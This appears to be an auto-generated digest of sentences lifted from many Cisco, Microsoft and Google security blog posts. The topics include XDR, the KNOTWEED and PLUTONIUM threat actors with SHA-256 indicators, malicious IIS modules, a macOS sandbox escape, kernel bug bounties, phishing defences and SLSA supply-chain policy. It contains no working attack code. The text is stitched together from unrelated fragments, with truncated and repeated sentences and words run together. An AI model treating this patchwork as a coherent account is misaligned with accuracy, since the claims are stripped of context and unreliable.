Now, we take a look at organizations in the Americas to find out how they fare across four security outcomes that are critical for building resilience, based on findings from Cisco’s latest Security Outcomes Study.

What’s really at the crux of these differences in security resilience among countries?

You may be wondering if implementing these five security practices improved resilience across organizations in the Americas.

The past few months have been chockfull of conversations with security customers, partners, and industry leaders.

Security practitioners want an easier way to secure the edge, access, and operations—including threat intelligence and response.

And the good news is that Cisco Security Business Group is already on the journey actively addressing these headlines, and empowering our customers to reach their full potential, securely.

Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social ChannelsInstagramFacebookTwitterLinkedInShareShare:

This new eBook, SOC Modernization and the Role of XDR, provides insights into the survey.

To help fill those skills gaps, improved threat detection playbooks and incident prioritization will be critical aspects of the security operations strategy.

While a common industry definition remains elusive, one thing is clear: XDR will play a critical role in the modernization of the security operations center.

Don’t wait to start planning how XDR will help your security operations team.

See XDR done right: Cisco XDR Buyer’s GuideShareShare:

If the IT security team communicates in terms of improving a corporate governance score, it will get their attention.

Corporate governance benchmarks, such as the Institutional Shareholder Services (ISS) ESG Governance QualityScore, are a focus area for boards, management, and investment analysts.1 This is a language that they speak.

Leaders in the corporate governance space have recognized the part that IT security plays in corporate governance and have included this in their scoring methodology.

How corporate governance scores are calculatedThe ISS ESG Governance QualityScore is a data-driven scoring and screening solution designed to help institutional investors monitor portfolio company…

Because of the challenges of enterprise endpoint security, enterprise companies must play it like a team sport.

One of our goals with Microsoft Endpoint Manager is to meet this ideal and enable seamless collaboration between security and IT.

Because Endpoint Manager has integrated firewall management, the security team could communicate the need for a change to the IT team.

While no single tool can guarantee a good night’s sleep, using a single, powerful tool for endpoint security and management can help relieve stress.

Before adopting Endpoint Manager, security agents on NAB desktops impacted performance, and update compliance rates were around 60 percent.

Defender Experts for Hunting was created for customers who have a robust security operations center but want Microsoft to help them proactively hunt threats using Microsoft Defender data.

Experts on Demand —Click the “Ask Defender Experts” button in the Microsoft 365 Defender portal to get expert advice about threats your organization is facing.

—Click the “Ask Defender Experts” button in the Microsoft 365 Defender portal to get expert advice about threats your organization is facing.

How we hunt:Step 1 : Microsoft Defender Experts monitor telemetry and look for malicious activity across the Microsoft 365 Defender platform associated with human adversaries or hands-on-keyboard attacks.

: Mi…

Plus, find out where you can see a live product demo of all of our threat intelligence products at Black Hat.

Unmask your adversaries with Microsoft Defender Threat IntelligenceToday, any device connected to the internet is susceptible to vulnerabilities.

Microsoft Defender Threat Intelligence maps the internet every day, providing security teams with the necessary information to understand adversaries and their attack techniques.

This depth of threat intelligence is created from the security research teams formerly at RiskIQ with Microsoft’s nation-state tracking team, Microsoft Threat Intelligence Center (MSTIC), and the Microsoft 365 Defender security research teams.

This intelligence al…

In this blog post, Patrick talks about security and hiring challenges in the industrial security industry.

Brooke: How did you get into industrial security?

Brooke: Why are industrial systems targeted in cyberattacks?

Brooke: What are the biggest challenges in securing industrial systems?

Patrick: With industrial systems, our biggest worry is our legacy environment because it is just old.

This blog details Microsoft’s analysis of the observed KNOTWEED activity and related malware used in targeted attacks against our customers.

Microsoft Defender Antivirus and Microsoft Defender for Endpoint have also implemented detections against KNOTWEED’s malware and tools.

MSTIC has found multiple links between DSIRF and the exploits and malware used in these attacks.

Indicator Type Description 78c255a98003a101fa5ba3f49c50c6922b52ede601edac5db036ab72efc57629 SHA-256 Malicious Excel document and VBA 0588f61dc7e4b24554cffe4ea56d043d8f6139d2569bc180d4a77cf75b68792f SHA-256 Malicious Excel document and VBA 441a3810b9e89bae12eea285a63f92e98181e9fb9efd6c57ef6d265435484964 SHA-256 Jumplump malw…

Malicious IIS extensions are less frequently encountered in attacks against servers, with attackers often only using script web shells as the first stage payload.

This leads to a relatively lower detection rate for malicious IIS extensions compared to script web shells.

In this blog post, we detail how IIS extensions work and provide insight into how they are being leveraged by attackers as backdoors.

IIS modules and handlers are .NET components that serve as the main points of extensibility in the pipeline.

Creating custom managed IIS modulesTo create a managed IIS module, the code must implement the IHttpModule interface.

Nitika is always learning, growing, and honing her expertise in identity, product management, and leadership so she’ll be ready to take on the next big challenge.

Nitika’s interview with Microsoft Partner Director of Identity Security Alex Weinert has been edited for clarity and length.

During my second interview with Microsoft, the interviewer told me about a new role called program manager, which is now called product manager.

They ended up giving me an offer to join Microsoft as a program manager in the identity team.

What was your first project as a new product manager at Microsoft?

Microsoft’s compliance journey has given us insights and best practices that we can share with other organizations determined to strengthen their compliance management practices.

Compliance management has gone from a nice to have to a must-have for organizations, which have huge a incentive to strengthen their compliance management practices.

Visionary Wealth Advisors was able to maximize security and compliance with Microsoft Purview Data Lifecycle Management and CellTrust SL2.

Through a solution like Microsoft Purview Communication Compliance, organizations can reduce risks related to regulatory compliance obligations.

These solutions include Microsoft Purview eDiscovery, which helps you …

Microsoft Purview product announcementsToday, we are excited to announce the general availability of the new Microsoft Graph APIs for Microsoft Purview eDiscovery.

BDO’s Athenagy integrates with Microsoft Purview eDiscoveryBDO’s Athenagy creates dashboards using both Microsoft Purview eDiscovery and RelativityOne.

Epiq Global integrates with Microsoft Purview eDiscoveryEpiq leverages Microsoft Purview eDiscovery APIs to create an end-to-end eDiscovery workflow.

With our investments in Microsoft Graph APIs we currently enabling extensibility scenarios across Purview Information Protection, Purview Data Lifecycle Management, Purview eDiscovery, Purview Audit, and more.

Partner with Microsoft …

It’s incredible to see that the Microsoft Security partner opportunity grew 21 percent year-over-year across the board in Microsoft 365 security, cloud security, compliance, and identity:With the shift to hybrid work, workplace security has seen the most growth.

It’s exciting to see that customers are taking advantage of the expanded security capabilities we’ve added to Microsoft 365, and enlisting partners to help them protect frontline workers, implement data discovery for Microsoft Teams, and activate more Microsoft 365 workloads securely.

It’s exciting to see that customers are taking advantage of the expanded security capabilities we’ve added to Microsoft 365, and enlisting partners to…

PLUTONIUM is a North Korean threat actor group affiliated with clusters of activity that are also known as DarkSeoul and Andariel.

SiennaBlue ransomware family: HolyRS.exe, HolyLocker.exe, and BTLC.exeBetween October 2021 and May 2022, MSTIC observed a cluster of new DEV-0530 ransomware variants written in Go.

BTLC.exe is the latest DEV-0530 ransomware variant and has been seen in the wild since April 2022.

Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode.

Use device discovery to increase visibility into the network by find…

Microsoft is recognized as a Leader in the Unified Endpoint Management Software 2022 Vendor Assessment IDC MarketScape report, including Ruggedized/Internet of Things Device Deployments and Small and Midsize Businesses.

Microsoft Endpoint Manager is an integrated solution that simplifies management across multiple operating systems, cloud, on-premises, mobile, desktop, and virtualized endpoints.

Keep up with ongoing developments on Unified Endpoint Management (UEM) by visiting the Microsoft Endpoint Manager Tech Community blog and exploring Microsoft Endpoint Manager.

To learn more about Microsoft Security solutions, visit our website.

IDC MarketScape: Worldwide Unified Endpoint Management …

Microsoft uncovered a vulnerability in macOS that could allow specially crafted codes to “escape” the App Sandbox and run unrestricted on the system.

The App Sandbox is Apple’s access control technology that application developers must adopt to distribute their apps through the Mac App Store.

An attacker could take advantage of this sandbox escape vulnerability to gain elevated privileges on the affected device or execute malicious commands like installing additional payloads.

How macOS App Sandbox worksIn a nutshell, macOS apps can specify sandbox rules for the operating system to enforce on themselves.

Currently, the most promising technology is the macOS App Sandbox.

Posted by Eduardo Vela, Exploit CriticThe Linux kernel is a key component for the security of the Internet.

All of GKE and its dependencies are in scope, but every flag caught so far has been a container breakout through a Linux kernel vulnerability.

We’ve learned that finding and exploiting heap memory corruption vulnerabilities in the Linux kernel could be made a lot harder.

For new exploits of vulnerabilities submitted which also compromise the latest Linux kernel, we will pay an additional $21,000 USD.

We hope that, over time, we will be able to make security mitigations that make exploitation of Linux kernel vulnerabilities as hard as possible.

When Chrome users browse the web with Safe Browsing protections, Chrome uses the Safe Browsing service from Google to identify and ward off various threats.

In the most common case, Chrome uses the privacy-conscious Update API (Application Programming Interface) from the Safe Browsing service.

This API was developed with user privacy in mind and ensures Google gets as little information about the user's browsing history as possible.

Chrome with Safe Browsing checks all URLs, redirects or included resources, to identify such threats and protect users.

Safe Browsing ListsSafe Browsing provides a list for each threat it protects users against on the internet.

Posted by Matthew Maurer and Mike Yu, Android teamTo help keep Android users’ DNS queries private, Android supports encrypted DNS.

In addition to existing support for DNS-over-TLS, Android now supports DNS-over-HTTP/3 which has a number of improvements over DNS-over-TLS.

This issue is mitigated by central resolvers like Google, Cloudflare, OpenDNS and Quad9, which allow devices to configure a single DNS resolver locally for every network, overriding what is offered through DHCP.

In Android 9.0, we announced the Private DNS feature, which uses DNS-over-TLS (DoT) to protect DNS queries when enabled and supported by the server.

Unfortunately, DoT incurs overhead for every DNS request.

We blocked 1 domain from eligibility to appear on Google News surfaces and Discover as part of our investigation into coordinated influence operations linked to Iran.

The campaign was linked to Endless Mayfly and was sharing content in English about a variety of topics including US and global current events.

We received leads from Mandiant that supported us in this investigation.

We can’t wait to see whether PPP will be able to defend their crown.

For those of you looking to satisfy your late-night hacking hunger: past year's challenges, including Hackceler8 2021 matches, are open-sourced here .

On top of that there are hours of Hackceler8 2020 videos to watch!If you are just starting out in this space, last year’s Beginner’s Quest is a great resource to get started.

Sign up to expand your skill set, meet new friends in the security community, and even watch the pros in action.

For the latest announcements, see g.co/ctf subscribe to our mailing list , or follow us on @GoogleVRP .

These are relatively minor hurdles, though, and we were able to successfully run the tool with only small manual adjustments.

SBOM in the futureIt’s clear that we’re getting very close to achieving the original goal of SBOMs: using them to help manage the risk of vulnerabilities in software.

This increased interest in SBOMs saw another boost after the National Institute of Standards and Technology (NIST) released its Secure Software Development Framework , which requires SBOM information to be available for software.

This is a security problem if the JWT token is presented to a service that lacks its own audience check.

This information can be helpful to determine if any additional action i…

New Details About 2022 GCP VRPWe will pay out a total of $313,337 to the top seven submissions in the 2022 edition of the GCP VRP Prize.

Individual prize amounts will be as follows:1st prize: $133,3372nd prize: $73,3313rd prize: $31,3374th prize: $31,3115th prize: $17,3116th prize: $13,3737th prize: $13,337If you are a security researcher, here's how you can enter the competition for the GCP VRP Prize 2022:Find a vulnerability in a GCP product (check out Google Cloud Free Program to get started).

Your bug needs to be awarded a financial reward to be eligible for the GCP VRP Prize (the GCP VRP Prize money will be in addition to what you received for your bug!).

One of the goals behind the GC…

In this spirit, this post is about our journey of using heap scanning technologies to improve memory safety of C++.

Temporal memory safety refers to the problem of guaranteeing that memory is always accessed with the most up to date information of its structure, its type.

While there is appetite for different languages than C++ with stronger memory safety guarantees, large codebases such as Chromium will use C++ for the foreseeable future.

Chrome even goes further and employs a C++ garbage collector called Oilpan which deviates from regular C++ semantics but provides temporal memory safety where used.

This is similar to a garbage collected system in that it provides temporal memory safety b…

Privileged pods within the context of GKE securityWhile privileged pods can pose a security issue, it’s important to look at them within the overall context of GKE security.

To use a privileged pod as a “trampoline” in GKE, there is a major prerequisite – the attacker has to first execute a successful application compromise and container breakout attack.

While privileged pods can pose a security issue, it’s important to look at them within the overall context of GKE security.

Where privileged pods are required for the operation of a feature, we’ve added additional documentation to illustrate that fact.

In addition to the measures above, we recommend users take advantage of tools that can sc…

With Android 13 we have migrated to a new model for the provisioning of attestation keys to Android devices which is known as Remote Key Provisioning (RKP).

We now have more than 30 components in Android that can be automatically updated through Google Play, including new modules in Android 13 for Bluetooth and ultra-wideband (UWB).

In Android 13 we implemented numerous enhancements to help mitigate potential vulnerabilities that app developers may inadvertently introduce.

In Android 13, app makers can go above and beyond in removing permissions even more proactively on behalf of their users.

Later this year, we’ll begin rolling out a new destination in settings on Android 13 devices that p…

In these attacks, a user thinks they're logging into the intended site, just as in a standard phishing attack.

But instead of deploying a simple static phishing page that saves the victim's email and password when the victim tries to login, the phisher has deployed a web service that logs into the actual website at the same time the user is falling for the phishing page.

In these attacks, a user thinks they're logging into the intended site, just as in a standard phishing attack.

Phishing-resistant authentication using FIDO with security keys or a Bluetooth connection to your phone.

Through these efforts we introduced physical FIDO security keys, such as the Titan Security Key , which preve…

Google,a member of theTo better understand how the Package Analysis program is contributing to supply chain security, we analyzed the nearly 200 malicious packages it captured over a one-month period.

Here’s what we discovered: Despite open source software’s essential role in all software built today, it’s far too easy for bad actors to circulate malicious packages that attack the systems and users running that software.

The Package Analysis program performs dynamic analysis of all packages uploaded to popular open source repositories and catalogs the results in a BigQuery table.

The short time frame and low sophistication needed for finding the results above underscore the challenge facing…

Last year we introduced multiple privacy focused features, enhanced our protections against bad apps and developers, and improved SDK data safety.

The Data safety section launched this week, and developers are required to complete this section for their apps by July 20th.

Last year, we engaged with SDK developers to build a safer Android and Google Play ecosystem.

Our new Security hub helps protect your phone, apps, Google Account, and passwords by giving you a central view of your device’s current configuration.

In addition, Pixels now use new machine learning models that improve the detection of malware in Google Play Protect.

The Squirrel package ‘foo’ The Oppy package ‘baz’ A custom executable, ‘bar’, written by Acme employees.

bar is compiled from source code stored in the same source repo as the Dockerfile.

acorn install downloads ‘foo’ from the Squirrel repo, verifying the VSA, and recording the use of acorn://[email protected] and its VSA in the build.

The build process assembles the SLSA provenance for the container by:Recording the Acme git repo the bar source and Dockerfile came from, into materials.

Creating a signed DSSE with the SLSA provenance and adding it to the output in-toto bundle.

Squirrel will also allow packages to create SLSA 0 policies if they’re not using SLSA compliant infrastructure.

A minimal delegated verification policy might be “allow if trusted-party verified this artifact (identified by digest) as ”.

For example, “allow if trusted-party verified this artifact as at SLSA 3 and it doesn’t have any dependencies less than SLSA 2”.

They could then configure this ID/key pair for use throughout Acme and be confident that any software used has been verified according to Acme policy.

“Squirrel package ‘foo’ must have been built & signed by ‘spiffe://foobar.com/foo-builder, from github.com/foo/acorn-foo, and be SLSA 4”.